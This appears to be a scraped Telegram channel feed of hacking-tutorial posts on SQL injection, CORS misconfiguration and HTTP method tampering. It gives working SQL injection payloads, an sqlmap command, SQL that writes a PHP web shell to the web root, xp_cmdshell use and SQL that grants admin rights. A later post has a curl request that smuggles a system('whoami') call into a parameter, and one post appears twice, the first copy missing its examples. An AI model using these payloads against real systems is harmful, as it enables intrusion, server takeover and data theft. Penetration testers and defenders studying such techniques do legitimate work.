Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
━━━━━━━━━━━━━━━━━━
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
🔹Method 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
━━━━━━━━━━━━━━━━━━
🔹Method 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
━━━━━━━━━━━━━━━━━━
🔹 Method 3: Using SQLMap for Automated Testing
🔹 SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
━━━━━━━━━━━━━━━━━━
🔹Method 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
━━━━━━━━━━━━━━━━━━
🔹Method 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
━━━━━━━━━━━━━━━━━━
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
🔹Example: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
🔹If SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
━━━━━━━━━━━━━━━━━━
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
💡 Conclusion
•Test manually using ' and OR 1=1
•Use SQLMap for automatic SQLi detection
•Escalate SQLi to RCE if the system allows file operations
•Test SQL Sleep (Time-Based Injection) for hidden errors
•Use UNION SELECT to extract sensitive data
━━━━━━━━━━━━━━━━━━
🚀 Join now
[https://t.me/ExploitQuest]
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
Telegram
ExploitQuest
contact: @ExploitQuestbot
👍11❤6
CORS one liner command exploiter
This is an extremely helpful and practical Cheatsheet for Bug Hunters, which helps you find CORS missconfiguration in every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CORS.
Github
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
GitHub
GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.
A one liner Bash command which finds CORS in every possible endpoint. - kleiton0x00/CORS-one-liner
👍5👏5
Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
━━━━━━━━━━━━━━━━━━
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
•Database credentials.
•Environment variables.
•File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
━━━━━━━━━━━━━━━━━━
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
The server might respond with:
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
━━━━━━━━━━━━━━━━━━
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
•Database credentials.
•Environment variables.
•File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
━━━━━━━━━━━━━━━━━━
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
👍5🔥2❤1